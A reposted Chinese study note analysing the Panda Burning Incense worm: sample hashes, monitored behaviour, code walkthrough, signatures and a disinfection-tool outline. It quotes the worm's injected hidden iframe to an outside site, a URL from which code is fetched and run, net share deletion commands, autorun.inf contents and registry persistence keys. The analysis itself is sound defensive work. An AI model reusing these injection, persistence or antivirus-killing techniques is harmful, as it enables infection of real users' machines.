脚本宝典收集整理的这篇文章主要介绍了病毒分析学习笔记-熊猫烧香，脚本宝典觉得挺不错的，现在分享给大家，也给大家做个参考。

熊猫烧香

分析病毒四步：

1. 提取样本，模拟手工查杀的方式去进行分析

2. 行为分析，使用监控工具行为分析

3. 详细分析：使用OD和IDA动静结合方式分析恶意代码，尽可能找出恶意代码行为，及实现步骤

4. 解决方案：报告和专杀工具

一般都是先中了病毒，再去杀毒，

提取样本第一时间手工清理或修复机器现场，之后再做分析

 

1．样本概况

1.1 样本信息

病毒名称: 熊猫烧香

所属家族：感染性病毒（Virus）/ 蠕虫病毒（Worm）

大小: 30001 bytes

修改时间: 2007年1月17日, 12:18:40

MD5: 512301C535C88255C9A252FDF70B7A03

SHA1: CA3A1070CFF311C0BA40AB60A8FE3266CFEFE870

CRC32: E334747C

病毒行为：

复制自身、感染PE文件、覆写PE文件、修改注册表自启动、结束杀软进程、删除杀软相关启动项。

 

1.2 测试环境及工具

测试环境：VMware　Workstation 16 PRO

工具：PCHunter、火绒剑、IDA、OD、ExeinfoPE

1.3 分析目标

分析病毒永久驻留方式，感染的方式，网络连接，病毒的恶意行为。

2．具体行为分析

2.1 主要行为

熊猫烧香主要行为如下：

@H_406_122@

文件操作：复制病毒、创建文件、感染文件等。

2. 注册表操作：自启动、创建注册表项、删除杀软注册表项、隐藏文件等。

3. 进程操作：遍历进程、跨进程读写、跨进程恢复线程、打开设备等。

4. 网络操作：连接局域网传播、访问门户网址、与木马网址通讯等

 

 

 

2.1.1 文件操作

1. 复制文件到C:WindowsSystem32driversspo0lsv.exe

2. 在各个目录创建了Desktop.ini 文件，里面保存的是病毒创建的日期。

3. 感染了大量文件，文件类型主要为exe和ini文件。

 

 

 

 

2.1.2 注册表操作

1.为自己创建了一个注册表项

HEKY_LOCAL_MACHINESoftwareMicrosoftTracingspo0lsv_RASAPI32，在里面写入了很多信息,

 

2.病毒开机自启动，在

HKEY_current_USERSoftwareMicrosoftWindowsCurrentVersionRun设置启动项 C:WIndowssystem32driversspo0lsvs.exe。

 

3.通过

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderHiddenSHOWALLCheckedValue隐藏文件。

 

4. 通过删除

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun 下的项来关闭杀毒软件自启动。

 

5. 修改IE的代理服务和连接设置。

 

2.1.3 进程操作

1. 遍历进程，可能是查找是否有杀软。

2. 打开和创建进程，启动C:Windowssystem32driversspo0lsv.exe

3. 跨进程读写内存，读写C:Windowssystem32driversspo0lsv.exe的内存

4. 跨进程恢复线程，恢复C:Windowssystem32driversspo0lsv.exe的线程，让其运行

5. 打开设备，打开的是Nsi和Afd

6. 查找窗口

 

2.1.4 网咯操作

1. 连接了局域网的一些地址，主要通过139、445端口连接。

@H_38_360@

 

2. 访问了一些门户网站：www.tom.COM、www.163.com等

 

3.与一些网址进行数据交换，数据经过了加密传输。

 

2.1.5 威胁行为总结

通过分析监控的日志以及人肉之后，可以分析出样本的恶意行为：

1. 自我复制样本到c盘，C:Windowssystem32driver目录下，启动C:Windowssystem32driversspo0lsv.exe（样本）。

2. 在每一个目录下创建了Desktop.ini文件，里面存放的是当前日期。

3. 在C盘根目录下创建了autorun.inf文件，里面制定了自启动的文件为根目录下的SETUP.exe（样本）。

4. 对程序目录下的exe进行了感染，图标变为exe，打开exe时，自动打开病毒。

5. 设置注册表启动项为C:Windowssystem32driversspo0lsv.exe（样本）

6. 设置注册表键值HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderHiddenSHOWALLCheckedValue，隐藏文件不显示。

7. 将注册表中杀毒软件启动项全部删除。

8. 自己创建了一个注册表的项HEKY_LOCAL_MACHINESOFTWAREMicrosoftTracingspo0lsv_RASAPI32，在其中写入了很多信息。

9. 修改注册表项IE浏览器的代理和连接设置。

10. 连接局域网的一些地址，访问外网的一些地址。

11. 使用cmd命令关闭网络共享。cmd.exe /c net share C$/del /y 和 cmd.exe /c net share admin$ /del /y

2.2 恶意代码分析

2.1恶意代码树结构图

熊猫烧香主要分为三个模块：

1. 自我保护和自我复制

2. 感染文件

3. 病毒自我保护

 

2.2 恶意程序的代码分析片段

2.1.1 病毒主逻辑

在程序开始时比较字符串是否相等，不相等则退出，接着依次执行自我复制和自我保护、感染全盘文件和病毒自我保护。

 

 

 

 

 

2.1.2 自我复制

自我复制和自我保护功能如下图所示：

 

 

1. 遍历进程”spo0lsv.exe”，通过创建进程快照方式遍历进程，然后判断是否是”spo0lsv.exe”，是的话就结束进程。

 

 

2. 若是病毒母体，则将自身拷贝至”C:Windowssystem32driversspo0lsv.exe”中。然后运行该文件，并退出本程序。

 

 

 

3. 若不是病毒源程序：将驱动目录的病毒程序spo0lsv.exe删除，再将自身写入获取drivers目录的spo0lsv.exe程序中，然后退出进程，再启动获取drivers目录下的spo0lsv.exe.

 

 

2.1.3 感染文件

病毒感染文件的主要逻辑如图所示：

 

 

1. 全盘感染

1.1 遍历全盘，找出存在的盘符并保存。

 

 

1.2 遍历目录排除特殊文件夹，并生成感染标识Desktop_.ini文件，里面保存当前时间

 

 

 

 

1.3 对EXE、SCR、PIF、COM后缀的文件使用函数sub_407F00进行感染,，主要是将使用病毒文件替换源文件，然后再将源文件添加到病毒文件中。

 

 

1.4 对htm、htML、asp、php、jsp、aspx后缀的文件，使用sub_4079CC函数进行感染，主要是将<iframe src=http://www.ac86.cn/66/index.htm width=”0”height=”0”></iframe>写入文件末尾。

 

2. 定时器方式感染

2.1 设置一个定时器，判断C盘根路径下setup.exp和autorun.inf文件是否存在，没有则创建这两个文件，将病毒自身复制到setup.exe中，在autorun.inf中写入”[AutoRun] noPEN=setup.exe shellAutocommand =setup.exe ”

 

 

3. 局域网感染

3.1建立TCP客户端，然后当病毒发现能连接到到局域网主机的139端口或445端口时，匹配管理员弱口令密码，连接成功后将病毒上传。

 

2.1.4 病毒自我保护保护

熊猫烧香通过结束杀毒软件、设置自启动、隐藏文件、从网页下载代码并执行、删除网络共享、停止和删除杀软服务，删除杀软注册表启动项的方式对自己进行保护。

 

 

1. 结束杀软、自启动和隐藏文件

1.通过访问令牌提升权限。

 

 

2. 通过遍历窗口，然后发送WM_QUIT的方式结束杀毒软件。

 

 

3. 通过遍历进程结束杀毒软件。

 

4. 通过注册表设置自启动和隐藏文件

 

2. 从网页读取病毒源码

从网站http：//wangma.9966.org/down.txt读取病毒源码并运行。

 

3. 删除网络共享

使用以下几条命令来删除网络共享：

1. cmd.exe /c net share $ /del /y

2. cmd.exe /c net share admin$ /del /y

 

4.停止和删除杀软服务，删除杀软注册表启动项

停止杀软服务，删除杀软服务和删除杀软注册表启动项

 

3．解决方案

3.1 提取病毒的特征，利用杀毒软件查杀

病毒特征：

1. 字符串:

”whboy”、”xboy”、”Desktop_.ini”、”spo0lsv.exe”等

2. 网络地址：

http：//wangma.9966.org/down.txt

3.2工具查杀步骤及查杀思路

根据刚刚的详细分析可以针对该病毒行为，编写专杀工具来杀掉熊猫烧香病毒和恢复被感染文件，恢复被篡改的注册表项。思路如下，详细代码请见附录

3.1.1 专杀工具编写思路

1. 结束病毒进程

由之前分析可知病毒进程名称为spo0lsv.exe，故通过遍历进程的方式，获取进程名称进行比对，然后结束进程即可。

 

2. 恢复注册表

熊猫烧香对注册表的更改主要是设置熊猫烧香开机启动、修改文件隐藏属性和创建了一个熊猫烧香的注册表项。故我们针对其进行修改即可，删除熊猫烧香的自启动，改正文件隐藏属性和删除熊猫烧香创建的注册表项。

 

3. 删除病毒文件

删除熊猫烧香创建的一些感染标识文件、驱动目录下的病毒文件和根路径下的setup.exe和autorun.inf文件.

 

4. 恢复被

 

感染文件

根据被感染文件的类型恢复被感染文件，对于exe、scr、com和pif类文件，先获取文件大小，然后从文件末尾读出感染标识中存储的源文件的大小，再将源文件读出并写回即可恢复。对于htm、html、asp、php、jsp和aspx文件，只需将文件末尾的网址删除即可。

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

脚本宝典总结

以上是脚本宝典为你收集整理的病毒分析学习笔记-熊猫烧香全部内容，希望文章能够帮你解决病毒分析学习笔记-熊猫烧香所遇到的问题。

如果觉得脚本宝典网站内容还不错，欢迎将脚本宝典推荐好友。

本图文内容来源于网友网络收集整理提供，作为学习参考使用，版权属于原作者。
如您有任何意见或建议可联系处理。小编QQ：384754419，请注明来意。